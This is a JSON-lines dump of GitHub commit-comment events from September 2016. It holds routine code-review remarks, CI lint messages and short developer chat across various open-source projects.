{"id":"4543806069","type":"CommitCommentEvent","actor":{"login":"yuyichao"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18973210,"position":null,"line":null,"path":null,"commit_id":"843e0fea2549add6a7d1d6c752c5906691d601d6","created_at":"2016-09-10T09:59:06Z","updated_at":"2016-09-10T09:59:06Z","body":"Check against last daily benchmark that wasn't affected by the vectorization depwarn 7126d894cac4112fe75203cf8ffdf7862cbcdf21\r\n\r\n@nanosoldier `runbenchmarks(ALL, vs = \"@7126d894cac4112fe75203cf8ffdf7862cbcdf21\")`\r\n"}},"created_at":"2016-09-10T09:59:06Z"}
{"id":"4544942235","type":"CommitCommentEvent","actor":{"login":"azluck"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":18975429,"position":null,"line":null,"path":null,"commit_id":"e7ba9ce9bfe7c3d59bcb688f455ad9f4cd7b6021","created_at":"2016-09-11T00:01:23Z","updated_at":"2016-09-11T00:01:23Z","body":"谢谢！"}},"created_at":"2016-09-11T00:01:23Z"}
{"id":"4544943189","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18975430,"position":11,"line":11,"path":"src/findinterval.jl","commit_id":"02ce13367149bd47fa13fee1670ff2fd08057984","created_at":"2016-09-11T00:02:18Z","updated_at":"2016-09-11T00:02:18Z","body":"@panlanfeng Do you know why this still works? I have constrained `T` must be a `Number` type.\r\n```\r\nfindinterval([\"a\", \"b\"], [\"a\", \"b\"])\r\n```\r\n\r\n"}},"created_at":"2016-09-11T00:02:18Z"}
{"id":"4544943874","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975431,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-11T00:02:56Z","updated_at":"2016-09-11T00:02:56Z","body":"Nah, it is ok.. but I have dirs /sda7/test and /sda7/test2 but init is looking in /sda7/test and not /test2! \r\n\r\nThat is certainly a bug but I'll rename test2 to something more unique to see if i get a frugal boot - similar goes for the other box."}},"created_at":"2016-09-11T00:02:56Z"}
{"id":"4544945286","type":"CommitCommentEvent","actor":{"login":"vpatryshev"},"repo":{"name":"h2oai/h2o-3"},"payload":{"comment":{"id":18975433,"position":5,"line":254,"path":"h2o-algos/src/main/java/hex/deepwater/DeepWater.java","commit_id":"7897cb0fead964d9cd6f7c5f0f624440219e6ba0","created_at":"2016-09-11T00:03:55Z","updated_at":"2016-09-11T00:03:55Z","body":"I'm afraid it won't be effective if model.loss() == 0."}},"created_at":"2016-09-11T00:03:55Z"}
{"id":"4544946612","type":"CommitCommentEvent","actor":{"login":"businessBoris"},"repo":{"name":"akhodakivskiy/VimFx"},"payload":{"comment":{"id":18975436,"position":null,"line":null,"path":null,"commit_id":"a72892b19c50769076456b918538dc6a63f3a369","created_at":"2016-09-11T00:05:06Z","updated_at":"2016-09-11T00:05:06Z","body":"💜"}},"created_at":"2016-09-11T00:05:06Z"}
{"id":"4544947242","type":"CommitCommentEvent","actor":{"login":"smiley325"},"repo":{"name":"smiley325/quantum-elixir"},"payload":{"comment":{"id":18975438,"position":null,"line":null,"path":null,"commit_id":"4da56af2ddf514e0bd906998a356eb66cdc81352","created_at":"2016-09-11T00:05:38Z","updated_at":"2016-09-11T00:05:38Z","body":"@thbar Are you talking about this whole pull request or just this commit?"}},"created_at":"2016-09-11T00:05:38Z"}
{"id":"4544947390","type":"CommitCommentEvent","actor":{"login":"abettermap"},"repo":{"name":"CodeForFoco/bike-coop-theme"},"payload":{"comment":{"id":18975439,"position":null,"line":null,"path":null,"commit_id":"71e7b9f76af3e6761155a03a86906f23ceaa267d","created_at":"2016-09-11T00:05:46Z","updated_at":"2016-09-11T00:05:46Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;IYMKL3mo&#x2F;5-theme-header-nav-links\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Theme -- Header&#x2F;Nav&#x2F;Links</a>"}},"created_at":"2016-09-11T00:05:46Z"}
{"id":"4544947570","type":"CommitCommentEvent","actor":{"login":"abettermap"},"repo":{"name":"CodeForFoco/bike-coop-theme"},"payload":{"comment":{"id":18975440,"position":null,"line":null,"path":null,"commit_id":"98c5c787b19dfca11e7f881b6dd81b25eee78f7e","created_at":"2016-09-11T00:05:54Z","updated_at":"2016-09-11T00:05:54Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;IYMKL3mo&#x2F;5-theme-header-nav-links\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Theme -- Header&#x2F;Nav&#x2F;Links</a>"}},"created_at":"2016-09-11T00:05:54Z"}
{"id":"4544947770","type":"CommitCommentEvent","actor":{"login":"abettermap"},"repo":{"name":"CodeForFoco/bike-coop-theme"},"payload":{"comment":{"id":18975441,"position":null,"line":null,"path":null,"commit_id":"8a3bdfe701259b64a3851cd0186ab3659baa1f52","created_at":"2016-09-11T00:06:03Z","updated_at":"2016-09-11T00:06:03Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;IYMKL3mo&#x2F;5-theme-header-nav-links\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Theme -- Header&#x2F;Nav&#x2F;Links</a>"}},"created_at":"2016-09-11T00:06:03Z"}
{"id":"4544948694","type":"CommitCommentEvent","actor":{"login":"abettermap"},"repo":{"name":"CodeForFoco/bike-coop-theme"},"payload":{"comment":{"id":18975444,"position":null,"line":null,"path":null,"commit_id":"68af48425efb2278ac5e495a277b598399affeb8","created_at":"2016-09-11T00:06:51Z","updated_at":"2016-09-11T00:06:51Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;gSAZQuhe&#x2F;26-theme-fonts\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Theme -- Fonts</a>"}},"created_at":"2016-09-11T00:06:51Z"}
{"id":"4544949045","type":"CommitCommentEvent","actor":{"login":"lattner"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18975446,"position":null,"line":null,"path":null,"commit_id":"34fb15e3754df8d8e6f0d8cfcfda81ae5f86e324","created_at":"2016-09-11T00:07:11Z","updated_at":"2016-09-11T00:07:11Z","body":"Overloading on T? vs T! should have been removed as part of SE-0054.  If we still allowed it, that is really unfortunate.  We'd have to look at what the impact of breaking that is in practice.  Since this is parts of swift 3.1 anyway, it seems like we can roll it into the dialect flag for Swift 3.1 (but that means we may have to make some aspect of this conditional... somehow?)"}},"created_at":"2016-09-11T00:07:11Z"}
{"id":"4544951456","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975449,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-11T00:09:34Z","updated_at":"2016-09-11T00:09:34Z","body":"Booting now.. typo in psbdir= :crying_cat_face: \r\n\r\nlol.. oh well."}},"created_at":"2016-09-11T00:09:34Z"}
{"id":"4544951921","type":"CommitCommentEvent","actor":{"login":"Pave104"},"repo":{"name":"Pave104/POO_Paulo"},"payload":{"comment":{"id":18975450,"position":null,"line":null,"path":null,"commit_id":"e0f91bc019537964a15565d232f535a68ab81016","created_at":"2016-09-11T00:10:01Z","updated_at":"2016-09-11T00:10:01Z","body":"iniciando"}},"created_at":"2016-09-11T00:10:01Z"}
{"id":"4544954265","type":"CommitCommentEvent","actor":{"login":"aa65535"},"repo":{"name":"shadowsocks/openwrt-shadowsocks"},"payload":{"comment":{"id":18975455,"position":null,"line":null,"path":null,"commit_id":"bdcacb297092a3259cb2e2b5785cd215c78c3088","created_at":"2016-09-11T00:12:08Z","updated_at":"2016-09-11T00:12:08Z","body":"For shadowsocks depends.\r\n\r\nAbout [logs](https://github.com/shadowsocks/shadowsocks-libev/blob/v2.5.1/src/redir.c#L439\r\n), You can open an issue there: https://github.com/shadowsocks/shadowsocks-libev/issues\r\n"}},"created_at":"2016-09-11T00:12:08Z"}
{"id":"4544956066","type":"CommitCommentEvent","actor":{"login":"koriakin"},"repo":{"name":"envytools/envytools"},"payload":{"comment":{"id":18975457,"position":14,"line":53,"path":"docs/hw/display/nv3/pcrtc.rst","commit_id":"a23daa18665c86f12b1c0a4e94c97cb4575c2a4b","created_at":"2016-09-11T00:13:30Z","updated_at":"2016-09-11T00:13:30Z","body":"Wrong line for that fix (this reg is properly 32-bit)"}},"created_at":"2016-09-11T00:13:30Z"}
{"id":"4544957705","type":"CommitCommentEvent","actor":{"login":"gauthamzz"},"repo":{"name":"RaghavTheCyberdude/iiitahacks.github.io"},"payload":{"comment":{"id":18975460,"position":null,"line":null,"path":null,"commit_id":"3889c6a94f168cd4c5b3ee4c49aea1b1c5f40d47","created_at":"2016-09-11T00:14:49Z","updated_at":"2016-09-11T00:14:49Z","body":"This is not the way to do the pull request. Redo it and ask for a help from an organiser."}},"created_at":"2016-09-11T00:14:49Z"}
{"id":"4544958716","type":"CommitCommentEvent","actor":{"login":"ISAAC300"},"repo":{"name":"ryanterry131/gameboi"},"payload":{"comment":{"id":18975465,"position":null,"line":null,"path":null,"commit_id":"bfa2a952461df93a96b17db81889afbc28aaf3b3","created_at":"2016-09-11T00:15:46Z","updated_at":"2016-09-11T00:15:46Z","body":"- [x] Gotcha!"}},"created_at":"2016-09-11T00:15:46Z"}
{"id":"4544959084","type":"CommitCommentEvent","actor":{"login":"am11"},"repo":{"name":"am11/MaxMind-DB-Reader-dotnet"},"payload":{"comment":{"id":18975466,"position":21,"line":8,"path":".travis.yml","commit_id":"262da77bf923e8bb3afb7c752cba8e9cb7db4ab7","created_at":"2016-09-11T00:16:06Z","updated_at":"2016-09-11T00:16:06Z","body":"This was required by mono jobs as the build.sh implicitly does `cd $TRAVIS_BUILD_DIR/dev-bin/../mono`, which makes our helper tries to locate the unit test directory inside mono. With donet CLI job, build.sh changes pwd to `$TRAVIS_BUILD_DIR/dev-bin/..`, therefore the test runs from those jobs pass without this change."}},"created_at":"2016-09-11T00:16:06Z"}
{"id":"4544959158","type":"CommitCommentEvent","actor":{"login":"gauthamzz"},"repo":{"name":"sandmanx/iiitahacks.github.io"},"payload":{"comment":{"id":18975467,"position":null,"line":null,"path":null,"commit_id":"945a4fd1859e4fd77a66dbff0ec9e7c91688034e","created_at":"2016-09-11T00:16:10Z","updated_at":"2016-09-11T00:16:10Z","body":"This is not the way to do this. please ask help from organisers and send a pull request to main repo after editing."}},"created_at":"2016-09-11T00:16:10Z"}
{"id":"4544959747","type":"CommitCommentEvent","actor":{"login":"ryanterry131"},"repo":{"name":"ryanterry131/gameboi"},"payload":{"comment":{"id":18975468,"position":null,"line":null,"path":null,"commit_id":"bfa2a952461df93a96b17db81889afbc28aaf3b3","created_at":"2016-09-11T00:16:42Z","updated_at":"2016-09-11T00:16:42Z","body":"?"}},"created_at":"2016-09-11T00:16:42Z"}
{"id":"4544959807","type":"CommitCommentEvent","actor":{"login":"gauthamzz"},"repo":{"name":"Strategist-Roy/iiitahacks.github.io"},"payload":{"comment":{"id":18975469,"position":null,"line":null,"path":null,"commit_id":"d796ed4345e131b97466d8afcbffe5a94a65f30f","created_at":"2016-09-11T00:16:45Z","updated_at":"2016-09-11T00:16:45Z","body":"Send pr to main repo"}},"created_at":"2016-09-11T00:16:45Z"}
{"id":"4544961595","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18975471,"position":null,"line":null,"path":null,"commit_id":"d244e8b05e46314a8e51b9360be474f83e675695","created_at":"2016-09-11T00:18:12Z","updated_at":"2016-09-11T00:18:12Z","body":"Related to: backdrop/backdrop-issues#2142 "}},"created_at":"2016-09-11T00:18:12Z"}
{"id":"4544961961","type":"CommitCommentEvent","actor":{"login":"johnnymo87"},"repo":{"name":"Migno/Universal-Exp-Share-v.2"},"payload":{"comment":{"id":18975472,"position":11,"line":89,"path":"includes/path_functions.lua","commit_id":"a023678cae0847d8455dd8537720a7cf7f5381e9","created_at":"2016-09-11T00:18:33Z","updated_at":"2016-09-11T00:18:33Z","body":"Would it make it sense to define `trapped` as follows?\r\n```lua\r\nfunction isTrapped(message)\r\n  return  stringContains(message, \"CantRun\") or stringContains(message, \"CantSwitch\")\r\nend\r\n```\r\n\r\nAlso, I'm a little surprised that the way you have `trapped` defined inside `onBattleMessage` works at all, since it looks like you're only defining the method, not invoking it."}},"created_at":"2016-09-11T00:18:33Z"}
{"id":"4544962512","type":"CommitCommentEvent","actor":{"login":"kcolton"},"repo":{"name":"adamJLev/django-treebeard"},"payload":{"comment":{"id":18975474,"position":null,"line":null,"path":null,"commit_id":"8dff33e7977c09bfd718f65ee8103ec92bd828e0","created_at":"2016-09-11T00:19:09Z","updated_at":"2016-09-11T00:19:09Z","body":"@adamJLev This hurts my brain. Please submit as PR. The current PR for \"1.10\" has a larger diff...\r\n\r\nI also \"reviewed\" the merge request on the bitbucket source: https://bitbucket.org/tabo/django-treebeard/pull-requests/28/removed-usage-of-djangoconfurlspatterns/diff \r\n\r\nI thought the git maintainer was different, but if its the same person i'm confused why it's even in 2 places. His actual job that this probably spawned from must live in the Atlassian world and it's convenient for it to be in bitbucket or something."}},"created_at":"2016-09-11T00:19:09Z"}
{"id":"4544963651","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975477,"position":1,"line":1,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:20:17Z","updated_at":"2016-09-11T00:20:17Z","body":"You should add a shebang (useful in unix) `#!/usr/bin/env python3`"}},"created_at":"2016-09-11T00:20:17Z"}
{"id":"4544964704","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975478,"position":7,"line":5,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:21:17Z","updated_at":"2016-09-11T00:21:17Z","body":"I'd move everything that's not in the main method outside to a prisonerslib.py file.  That way, each strategy could live in its own file and import from the lib."}},"created_at":"2016-09-11T00:21:17Z"}
{"id":"4544964962","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975479,"position":17,"line":8,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:21:32Z","updated_at":"2016-09-11T00:21:32Z","body":"`raise NotImplementedError`"}},"created_at":"2016-09-11T00:21:32Z"}
{"id":"4544965979","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975481,"position":44,"line":29,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:22:31Z","updated_at":"2016-09-11T00:22:31Z","body":"I wouldn't make the ID accessible.  Just get rid of the getter and setter."}},"created_at":"2016-09-11T00:22:31Z"}
{"id":"4544967068","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975482,"position":28,"line":16,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:23:38Z","updated_at":"2016-09-11T00:23:38Z","body":"The class probably shouldn't keep track of its count.  It'd be better if the main method (or a Simulation class) just counted and assigned."}},"created_at":"2016-09-11T00:23:38Z"}
{"id":"4544968474","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18975483,"position":1,"line":1,"path":"once.sh","commit_id":"aadf7ac37aca8e0e680ed856300c660ddb5f1345","created_at":"2016-09-11T00:25:03Z","updated_at":"2016-09-11T00:25:03Z","body":"unknown regexp options: cfg"}},"created_at":"2016-09-11T00:25:03Z"}
{"id":"4544968476","type":"CommitCommentEvent","actor":{"login":"Kurimizumi"},"repo":{"name":"Kurimizumi/Honeybee-Hive"},"payload":{"comment":{"id":18975484,"position":null,"line":null,"path":null,"commit_id":"cffba96925cfa98f137664c1d22a6a8994c89435","created_at":"2016-09-11T00:25:03Z","updated_at":"2016-09-11T00:25:03Z","body":"#22 "}},"created_at":"2016-09-11T00:25:03Z"}
{"id":"4544968558","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975485,"position":30,"line":18,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:25:09Z","updated_at":"2016-09-11T00:25:09Z","body":"I'd do `def __init__(self, id, *args, **kwargs)`.  count and has_acted shouldn't be passed to the constructor.  the `*args` and `**kwargs` make it so that your main method could change the parameters passed and this strategy would still work."}},"created_at":"2016-09-11T00:25:09Z"}
{"id":"4544968661","type":"CommitCommentEvent","actor":{"login":"Stanzilla"},"repo":{"name":"Auctionator/Auctionator"},"payload":{"comment":{"id":18975486,"position":null,"line":null,"path":null,"commit_id":"91a004cc4c94c5900e522f5c4b1f1da266169754","created_at":"2016-09-11T00:25:14Z","updated_at":"2016-09-11T00:25:14Z","body":"Any reason why there is version checking at all? I don't see the benefit for an AH addon :/"}},"created_at":"2016-09-11T00:25:14Z"}
{"id":"4544969150","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975487,"position":55,"line":36,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:25:44Z","updated_at":"2016-09-11T00:25:44Z","body":"I don't think any of these getter/setter methods are needed or desirable"}},"created_at":"2016-09-11T00:25:44Z"}
{"id":"4544969904","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975488,"position":99,"line":56,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:26:29Z","updated_at":"2016-09-11T00:26:29Z","body":"You should be implementing `wait()` and `visit()`"}},"created_at":"2016-09-11T00:26:29Z"}
{"id":"4544970117","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18975489,"position":9,"line":9,"path":"app.rb","commit_id":"d85fea52c6915a9ece60abd8b9c0290e12c32934","created_at":"2016-09-11T00:26:42Z","updated_at":"2016-09-11T00:26:42Z","body":"Extra blank line detected."}},"created_at":"2016-09-11T00:26:42Z"}
{"id":"4544970549","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18975490,"position":11,"line":11,"path":"src/findinterval.jl","commit_id":"02ce13367149bd47fa13fee1670ff2fd08057984","created_at":"2016-09-11T00:27:09Z","updated_at":"2016-09-11T00:27:09Z","body":"This file is not included in `RFlavor.jl` at all, which means you are still calling the function defined in REPL not in this package.\r\nTry restart Julia and run again."}},"created_at":"2016-09-11T00:27:09Z"}
{"id":"4544970566","type":"CommitCommentEvent","actor":{"login":"GustavoRuiz9"},"repo":{"name":"GustavoRuiz9/ProjectDrizzle"},"payload":{"comment":{"id":18975492,"position":4,"line":262,"path":"Drezle/src/main/webapp/WEB-INF/jsp/Hola.jsp","commit_id":"974b6e70a0536af6863283fd9e9ffd48f93fb54a","created_at":"2016-09-11T00:27:10Z","updated_at":"2016-09-11T00:27:10Z","body":"no se borraba"}},"created_at":"2016-09-11T00:27:10Z"}
{"id":"4544970719","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18975493,"position":2,"line":2,"path":"app.json","commit_id":"890d940f6bccede4edc0b5d34872eb938ae7cbd7","created_at":"2016-09-11T00:27:18Z","updated_at":"2016-09-11T00:27:18Z","body":"unexpected token tCOLON"}},"created_at":"2016-09-11T00:27:18Z"}
{"id":"4544970849","type":"CommitCommentEvent","actor":{"login":"GustavoRuiz9"},"repo":{"name":"GustavoRuiz9/ProjectDrizzle"},"payload":{"comment":{"id":18975494,"position":4,"line":262,"path":"Drezle/src/main/webapp/WEB-INF/jsp/Hola.jsp","commit_id":"974b6e70a0536af6863283fd9e9ffd48f93fb54a","created_at":"2016-09-11T00:27:26Z","updated_at":"2016-09-11T00:27:26Z","body":"naaa"}},"created_at":"2016-09-11T00:27:26Z"}
{"id":"4544970936","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975495,"position":135,"line":81,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:27:33Z","updated_at":"2016-09-11T00:27:33Z","body":"`RingLeader(i)` so that they know their ID"}},"created_at":"2016-09-11T00:27:33Z"}
{"id":"4544971005","type":"CommitCommentEvent","actor":{"login":"GustavoRuiz9"},"repo":{"name":"GustavoRuiz9/ProjectDrizzle"},"payload":{"comment":{"id":18975496,"position":4,"line":262,"path":"Drezle/src/main/webapp/WEB-INF/jsp/Hola.jsp","commit_id":"974b6e70a0536af6863283fd9e9ffd48f93fb54a","created_at":"2016-09-11T00:27:37Z","updated_at":"2016-09-11T00:27:37Z","body":"naaa"}},"created_at":"2016-09-11T00:27:37Z"}
{"id":"4544971197","type":"CommitCommentEvent","actor":{"login":"whoburg"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18975497,"position":null,"line":null,"path":null,"commit_id":"a9505a603e02673512347ac8b325b6d36572c5cd","created_at":"2016-09-11T00:27:48Z","updated_at":"2016-09-11T00:27:48Z","body":"I don't think 0.4.1.1 ever happened. What's the current release plan given all the recent and ongoing activity?"}},"created_at":"2016-09-11T00:27:48Z"}
{"id":"4544971264","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975498,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-11T00:27:53Z","updated_at":"2016-09-11T00:27:53Z","body":"After the near fatal PEBKAC issue I am now uploading 6.9.6.1 but it will be some hours."}},"created_at":"2016-09-11T00:27:53Z"}
{"id":"4544972231","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975500,"position":15,"line":7,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:28:49Z","updated_at":"2016-09-11T00:28:49Z","body":"Hm, we could get rid of wait and just have visit...I think that would make more sense (and would fit the way your main method currently works).  If we do that, visit needs a day number passed to it"}},"created_at":"2016-09-11T00:28:49Z"}
{"id":"4544972399","type":"CommitCommentEvent","actor":{"login":"luiges90"},"repo":{"name":"luiges90/ZhongHuaSanGuoZhi"},"payload":{"comment":{"id":18975501,"position":null,"line":null,"path":null,"commit_id":"30cc7659f319520c13ecafc01dec24e8b6753884","created_at":"2016-09-11T00:28:58Z","updated_at":"2016-09-11T00:28:58Z","body":"沒 :laughing: \r\n\r\n不過這樣，其實我手上有一個很舊的網遊代碼荒廢，不知你有沒興趣？"}},"created_at":"2016-09-11T00:28:58Z"}
{"id":"4544973900","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18975503,"position":2,"line":2,"path":"test.rb","commit_id":"a6bf02c7745fc52213fd023722beb95e83c67bf9","created_at":"2016-09-11T00:30:26Z","updated_at":"2016-09-11T00:30:26Z","body":"Operator + used in void context."}},"created_at":"2016-09-11T00:30:26Z"}
{"id":"4544973912","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18975504,"position":2,"line":2,"path":"test.rb","commit_id":"a6bf02c7745fc52213fd023722beb95e83c67bf9","created_at":"2016-09-11T00:30:26Z","updated_at":"2016-09-11T00:30:26Z","body":"Surrounding space missing for operator +."}},"created_at":"2016-09-11T00:30:26Z"}
{"id":"4544973922","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18975505,"position":3,"line":3,"path":"test.rb","commit_id":"a6bf02c7745fc52213fd023722beb95e83c67bf9","created_at":"2016-09-11T00:30:27Z","updated_at":"2016-09-11T00:30:27Z","body":"Operator + used in void context."}},"created_at":"2016-09-11T00:30:27Z"}
{"id":"4544973938","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18975506,"position":3,"line":3,"path":"test.rb","commit_id":"a6bf02c7745fc52213fd023722beb95e83c67bf9","created_at":"2016-09-11T00:30:28Z","updated_at":"2016-09-11T00:30:28Z","body":"Surrounding space missing for operator +."}},"created_at":"2016-09-11T00:30:28Z"}
{"id":"4544973949","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18975507,"position":4,"line":4,"path":"test.rb","commit_id":"a6bf02c7745fc52213fd023722beb95e83c67bf9","created_at":"2016-09-11T00:30:29Z","updated_at":"2016-09-11T00:30:29Z","body":"Operator + used in void context."}},"created_at":"2016-09-11T00:30:29Z"}
{"id":"4544973957","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18975508,"position":4,"line":4,"path":"test.rb","commit_id":"a6bf02c7745fc52213fd023722beb95e83c67bf9","created_at":"2016-09-11T00:30:29Z","updated_at":"2016-09-11T00:30:29Z","body":"Surrounding space missing for operator +."}},"created_at":"2016-09-11T00:30:29Z"}
{"id":"4544974339","type":"CommitCommentEvent","actor":{"login":"whoburg"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18975509,"position":6,"line":157,"path":"gpkitmodels/aircraft/engine_component_testing.py","commit_id":"8b29444d81601891a72bf7df688556936a8eff15","created_at":"2016-09-11T00:30:50Z","updated_at":"2016-09-11T00:30:50Z","body":"I agree with @bqpd's suggestion if it hasn't already happened."}},"created_at":"2016-09-11T00:30:50Z"}
{"id":"4544975146","type":"CommitCommentEvent","actor":{"login":"cco3"},"repo":{"name":"tnraptor14/prisonerpuzzle"},"payload":{"comment":{"id":18975512,"position":145,"line":87,"path":"prisoners.py","commit_id":"3c9573fcba1cf29236cafce9adc8964d91873107","created_at":"2016-09-11T00:31:36Z","updated_at":"2016-09-11T00:31:36Z","body":"This whole thing could be:\r\n\r\n    while not random.choice(prisoners).visit(light_bulb, day):\r\n        day += 1"}},"created_at":"2016-09-11T00:31:36Z"}
{"id":"4544975684","type":"CommitCommentEvent","actor":{"login":"silkychicken"},"repo":{"name":"aloha-studio/www"},"payload":{"comment":{"id":18975513,"position":27,"line":66,"path":"index.html","commit_id":"43b43674ffdd69854d43a74608448b2508606fbb","created_at":"2016-09-11T00:32:07Z","updated_at":"2016-09-11T00:32:07Z","body":"Dribbble"}},"created_at":"2016-09-11T00:32:07Z"}
{"id":"4544976296","type":"CommitCommentEvent","actor":{"login":"codebrainz"},"repo":{"name":"geany/geany"},"payload":{"comment":{"id":18975516,"position":13,"line":43,"path":"doc/plugins.dox","commit_id":"d54b65b9ac6d981a7f770abfb11f6dba2e875e2c","created_at":"2016-09-11T00:32:37Z","updated_at":"2016-09-11T00:32:37Z","body":"IMO, the `pluginsymbols.c` documentation should be updated with the new plugin symbols (eg. `geany_load_module()`, `geany_plugin_set_data()`, `geany_plugin_register_proxy()`, etc) rather than deprecated/hidden. I find often now I cannot easily find these critical plugin functions and this file was my goto for that kind of stuff with the legacy API."}},"created_at":"2016-09-11T00:32:37Z"}
{"id":"4544976846","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18975517,"position":11,"line":11,"path":"src/findinterval.jl","commit_id":"02ce13367149bd47fa13fee1670ff2fd08057984","created_at":"2016-09-11T00:33:09Z","updated_at":"2016-09-11T00:33:09Z","body":"By the way if you want to use the function `findinterval` directly, you need to export it in `RFlavor.jl`.\r\nWhat I usually do is \r\n```\r\nimport RFlavor.jl\r\nRFlavor.findinterval([\"a\", \"b\"], [\"a\", \"b\"])\r\n```\r\nAfter I modified the code, I run\r\n```\r\nreload(\"RFlavor\")\r\nRFlavor.findinterval([\"a\", \"b\"], [\"a\", \"b\"])\r\n```\r\nIf you copy and overwrite function definition in REPL, you cannot guarantee which version of definition is being used. For example, you defined a function\r\n```\r\nfunction f(x::Any)\r\n    x\r\nend\r\n```\r\nAnd you then modify it and define\r\n```\r\nfunction f(x::Number)\r\n    2*x\r\nend\r\n```\r\nThen when you call `f(\"a\")` you will find it is still working because previous version of `f` is being called.\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-11T00:33:09Z"}
